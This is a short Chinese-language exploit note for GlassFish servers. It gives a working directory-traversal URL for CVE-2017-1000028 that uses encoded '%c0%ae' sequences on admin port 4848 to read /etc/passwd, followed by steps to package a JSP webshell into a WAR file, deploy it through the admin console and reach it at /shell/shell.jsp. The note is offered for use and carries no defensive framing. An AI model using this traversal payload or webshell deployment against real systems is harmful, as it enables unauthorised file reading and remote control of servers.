GlassFish
1.漏洞复现
CVE-2017-1000028 目录穿越/任意文件读取漏洞
影响范围:GlassFish <=4.1.2
4848是管理端口,%c0%ae解析为.
访问https://IP:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
后台GetShell
将JSP一句话木马制作为war包
jar cvf shell.war shell.jsp
Applications->deploy->上传war包
木马路径:/shell/shell.jsp(根据自己的文件名改)